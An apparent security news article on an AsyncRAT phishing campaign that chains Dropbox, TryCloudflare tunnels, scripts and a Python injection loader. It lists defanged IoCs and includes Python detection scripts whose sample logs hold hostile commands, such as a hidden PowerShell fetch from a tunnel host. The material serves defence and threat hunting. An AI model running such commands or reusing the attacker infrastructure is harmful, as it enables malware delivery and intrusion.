AsyncRAT Campaign Uses TryCloudflare Tunnels and Python Loaders to Deliver Malware


An AsyncRAT malware campaign is using invoice-themed phishing emails, Dropbox downloads, TryCloudflare tunnels, shortcut files, PowerShell, JavaScript, batch scripts, and Python loaders to infect Windows systems. The goal is to install remote access malware while hiding the attack behind trusted cloud services and a fake invoice PDF.

The campaign does not rely on a single suspicious malware host. It moves through several stages, starting with a Dropbox-hosted ZIP file and then switching to temporary TryCloudflare infrastructure for additional payloads. This gives attackers disposable infrastructure that can be created and abandoned quickly.

A Forcepoint X-Labs analysis found that the infection chain ultimately uses a Python script named load.py and five binary files to inject malware into legitimate Windows processes. The final payloads include AsyncRAT, while some branches also deliver VenomRAT and XWorm.

How the AsyncRAT Campaign Starts

The attack begins with a phishing email that looks like an invoice notice. In the sample analyzed by researchers, a German-language button labeled "Rechnung herunterladen," meaning "download invoice," hid a Dropbox link that delivered the first ZIP archive.

Inside the ZIP file, attackers placed an internet shortcut file. When opened, that shortcut connected to a TryCloudflare-hosted WebDAV location and retrieved an LNK file, which then launched PowerShell to pull a JavaScript file from the same tunnel.

Cloudflare says TryCloudflare quick tunnels let developers test Cloudflare Tunnel without adding a site to Cloudflare DNS. Attackers abuse that convenience because a random trycloudflare.com subdomain can look less suspicious than an unknown standalone domain.

Attack Chain at a Glance

| Stage | File or service | Purpose |
|---|---|---|
| 1. Phishing lure | Invoice email | Tricks the user into clicking a download button. |
| 2. Initial download | Dropbox ZIP file | Delivers the first archive with an internet shortcut. |
| 3. Redirection | .URL file | Connects to a TryCloudflare WebDAV path. |
| 4. Execution | LNK and PowerShell | Downloads a JavaScript file from the same tunnel. |
| 5. Dropper | JavaScript and BAT file | Downloads the Python package and opens a decoy PDF. |
| 6. Loader | load.py and BIN files | Injects RAT payloads into legitimate Windows processes. |

The JavaScript stage retrieves an obfuscated batch file. That batch file carries out the main setup work by opening a fake invoice PDF for distraction, downloading a second ZIP archive, extracting it, checking whether Python is available, and running the Python loader.

The campaign's use of a visible PDF matters because it reduces suspicion. The victim sees a document open after clicking the invoice link, while the real infection chain continues in the background.

Python Loader Runs the Final Payload

The second ZIP file contains many files that look like ordinary Python setup components. Forcepoint found that only load.py and five BIN files were malicious, which helps bury the important payloads inside a larger folder structure.

The loader uses Python ctypes, a standard library module that can call functions from DLLs and shared libraries. In this case, the script uses Windows API calls for memory allocation, memory copying, thread creation, and execution control.

The malware then uses APC (asynchronous procedure call) injection to run shellcode inside other processes. Forcepoint described this as Early Bird APC Queue injection because the code gets queued into a newly created process before its main thread begins normal execution.

Payloads Include AsyncRAT, VenomRAT and XWorm

Different BIN files lead to different malware payloads. One file injects VenomRAT into notepad.exe, another injects XWorm, and the remaining files inject AsyncRAT shellcode into explorer.exe.

AsyncRAT gives attackers remote control over infected devices and can support spying, command execution, credential theft, and data collection. VenomRAT and XWorm offer similar remote access and information theft capabilities, which makes the campaign useful for broader cybercrime activity.

AsyncRAT attack chain (Source – Forcepoint)

The payloads communicate with the same command-and-control infrastructure over different ports, including traffic to 62.60.190[.]141 on ports 3232 and 4056. A second server, 62.60.190[.]196, also appeared in the published indicators.

Why TryCloudflare Abuse Keeps Appearing

This campaign fits a broader trend of attackers abusing trusted tunneling and cloud services. Proofpoint research previously tracked financially motivated campaigns that abused Cloudflare Tunnels to deliver remote access trojans, including XWorm, AsyncRAT, VenomRAT, GuLoader, and Remcos.

A related Trend Micro MDR report in January 2026 also described AsyncRAT activity that used Cloudflare free-tier infrastructure, Dropbox links, legitimate Python environments, and decoy PDF files to reduce detection.

Attackers benefit from this model because many defenders cannot simply block trusted services for every user. Instead, they need to inspect behavior, file types, command lines, and unusual connections that follow a click.

What Defenders Should Watch For

  • Invoice-themed emails that link to Dropbox archives or other file-sharing services.
  • ZIP files that contain .URL, .LNK, .JS, .BAT, .WSH, or double-extension files.
  • PowerShell launched by shortcut files, script files, or Microsoft Office processes.
  • Connections to random trycloudflare.com subdomains after an email click.
  • Python folders dropped into temporary or user-writable directories.
  • Explorer.exe or notepad.exe launching suspicious network traffic after script execution.

The Forcepoint report says customer protections covered several stages of the chain, including lure attachments, redirect URLs, dropper files, and call-home traffic. It also noted that Forcepoint NGFW can terminate LNK file transfers and suspicious PowerShell user-agent connections when inspection is enabled.

Defenders should combine gateway controls with endpoint logging. PowerShell logging, script block logging, command-line auditing, and detection for shortcut-file execution can reveal activity before the RAT finishes installation.
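The watch list and logging advice above can be turned into a small set of endpoint rules. The following is an added example, not code from Forcepoint or the report: it runs four rules over constructed Sysmon-style process-creation records (parent image, image, command line) and reports which rules each event trips. The directory names, extensions and parent-process set are my assumptions about what "shortcut or script file", "user-writable directory" and "script or Office process" mean in telemetry.

```python
import re

# Constructed Sysmon-style process-creation records modelled on the chain
# described above; none of these are real telemetry from the report.
EVENTS = [
    {"pid": 11, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\Rechnung.url"'},
    {"pid": 12, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c iwr https://words-here.trycloudflare.com/x.js"},
    {"pid": 13, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "& C:\Users\alice\AppData\Local\Temp\inv.bat"'},
    {"pid": 14, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\ma\python.exe",
     "cmdline": "python.exe load.py"},
    {"pid": 15, "parent": r"C:\Windows\explorer.exe",   # benign control row
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "firefox.exe https://www.dropbox.com/"},
]

# Assumed user-writable drop locations, shortcut/script extensions from the watch list,
# random quick-tunnel subdomains, and script/Office hosts that rarely spawn PowerShell.
USER_DIRS = re.compile(r"\\(Downloads|AppData|Temp|Public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(url|lnk|js|jse|bat|cmd|wsh|vbs)\b", re.I)
TUNNEL = re.compile(r"https?://[a-z0-9-]+\.trycloudflare\.com/", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def match_rules(ev):
    """Return the names of every watch-list rule the event satisfies."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    rules = []
    if SCRIPT_EXT.search(cmd) and USER_DIRS.search(cmd):
        rules.append("shortcut_or_script_in_user_dir")
    if img in ("powershell.exe", "pwsh.exe") and parent in SCRIPT_HOSTS:
        rules.append("powershell_from_script_or_office")
    if TUNNEL.search(cmd):
        rules.append("trycloudflare_url_on_cmdline")
    if img == "python.exe" and USER_DIRS.search(ev["image"]):
        rules.append("python_from_user_dir")
    return rules

def hunt(events):
    """Map pid -> matched rules for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        rules = match_rules(ev)
        if rules:
            hits[ev["pid"]] = rules
    return hits
```

Each rule alone is noisy on a developer workstation; the signal the article describes is several of them firing within one process tree shortly after an email click.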

Indicators of Compromise

The following indicators came from the public analysis and should support threat hunting. Teams should use them with behavior-based detections because tunnel domains and payload locations can change quickly.

| Type | Indicator | Description |
|---|---|---|
| Host | inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/ | TryCloudflare location used to host the LNK stage |
| Host | mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip | TryCloudflare location used to deliver the Python package |
| Host | sufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zip | Alternate TryCloudflare location for the Python package |
| C2 IP | 62.60.190[.]141 | Command-and-control server contacted over ports 3232 and 4056 |
| C2 IP | 62.60.190[.]196 | Secondary command-and-control server |
| File hash | 4747ee49bdf31351c025049d8c3b7fef831be77c | load.py Python loader |
| File hash | 0aa1b8fba8d7bd19a0064edfdf86c027da253644 | LNK file that triggers the PowerShell stage |
| File hash | cd61de9e4003ba568ae76f064935addb106a6d6d | Obfuscated batch file that downloads the Python package |
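Published indicators are defanged, so they have to be refanged before they will match anything in proxy, firewall or EDR logs, and an exact-token match is needed so a C2 address does not match a longer unrelated value. This added example (my code, not Forcepoint's) does both over constructed log lines; it uses the host part of the tunnel indicators from the table above, since proxy logs usually record host and path separately, and the log format itself is an assumption.

```python
import re

# Indicators exactly as the table above publishes them (defanged with "[.]").
DEFANGED_IOCS = {
    "inventory-card-thumbzilla-ip[.]trycloudflare[.]com": "TryCloudflare host for the LNK stage",
    "mercy-synopsis-notify-motels[.]trycloudflare[.]com": "TryCloudflare host for the Python package",
    "sufficiently-points-est-minimize[.]trycloudflare[.]com": "alternate host for the Python package",
    "62.60.190[.]141": "C2 server, ports 3232 and 4056",
    "62.60.190[.]196": "secondary C2 server",
    "4747ee49bdf31351c025049d8c3b7fef831be77c": "load.py loader (40-hex file hash)",
}

def refang(ioc):
    """Undo the defanging so the value matches what real logs contain."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

# Constructed proxy, firewall and EDR log lines (not from the report).
LOG_LINES = [
    "2026-01-20T09:14:03Z proxy user=alice dst=mercy-synopsis-notify-motels.trycloudflare.com path=/ma.zip status=200",
    "2026-01-20T09:14:09Z fw src=10.0.0.15 dst=62.60.190.141 dport=4056 action=allow",
    "2026-01-20T09:14:40Z edr host=WS01 file=C:\\Temp\\ma\\load.py sha1=4747ee49bdf31351c025049d8c3b7fef831be77c",
    "2026-01-20T09:15:00Z proxy user=bob dst=www.dropbox.com path=/s/abc status=200",
    "2026-01-20T09:15:30Z fw src=10.0.0.16 dst=162.60.190.141 dport=443 action=allow",  # prefix trap, must not match
]

def find_hits(lines, iocs=DEFANGED_IOCS):
    """Return (defanged indicator, description, line) for every exact-token match."""
    hits = []
    for line in lines:
        for defanged, desc in iocs.items():
            # Token boundaries stop 62.60.190.141 from matching inside 162.60.190.141.
            pattern = r"(?<![\w.-])" + re.escape(refang(defanged)) + r"(?![\w.-])"
            if re.search(pattern, line, re.I):
                hits.append((defanged, desc, line))
    return hits
```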

How to Reduce Exposure

Organizations should block or detonate shortcut files and script files delivered through email or downloaded archives. They should also apply stricter inspection to file-sharing links when a message uses invoice, payment, purchase order, or delivery themes.

Fake PDF file used for distraction (Source – Forcepoint)

The Proofpoint findings show that many related campaigns use internet shortcut files, WebDAV, LNK or VBS files, BAT or CMD scripts, and Python installers. Blocking one stage may not stop every variant, so layered detection matters.

The Trend Micro analysis also shows why defenders should review Dropbox downloads, TryCloudflare connections, startup persistence, and script-driven Python execution together instead of treating each event as isolated.

Actual malicious files (Source – Forcepoint)

Bottom Line

The campaign shows how attackers can turn everyday cloud and developer services into malware delivery infrastructure. Dropbox hosts the first archive, TryCloudflare serves later stages, Python runs the loader, and legitimate Windows processes hide the final payload.

For security teams, the most important signal is not just the domain name. The suspicious pattern comes from the chain of events: an invoice email, a compressed archive, a shortcut file, a script interpreter, PowerShell, a Python loader, and injected code.

The Cloudflare TryCloudflare documentation explains the legitimate purpose of quick tunnels, while the Python ctypes documentation and MITRE ATT&CK mapping help explain why the loader can interact with low-level Windows functions and inject code into other processes.

FAQ

What is the AsyncRAT TryCloudflare campaign?

It is a malware campaign that uses invoice phishing emails, Dropbox downloads, TryCloudflare tunnels, script files, and Python loaders to deliver AsyncRAT and other remote access trojans.

How does the AsyncRAT infection start?

The attack starts with a phishing email that links to a Dropbox ZIP file. The ZIP contains an internet shortcut that connects to TryCloudflare infrastructure and starts the next malware stages.

Why do attackers use TryCloudflare tunnels?

Attackers use TryCloudflare tunnels because they provide temporary cloud-hosted subdomains that can appear more trustworthy than unknown malware servers and can be rotated quickly.

What does the Python loader do?

The Python loader runs load.py and processes several BIN files. It uses Windows API calls to place shellcode into legitimate processes such as explorer.exe and notepad.exe.

How can organizations detect this campaign?

Organizations should monitor invoice-themed phishing, ZIP files with shortcut or script files, PowerShell launched from LNK files, random trycloudflare.com connections, suspicious Python execution, and unusual network traffic from explorer.exe or notepad.exe.
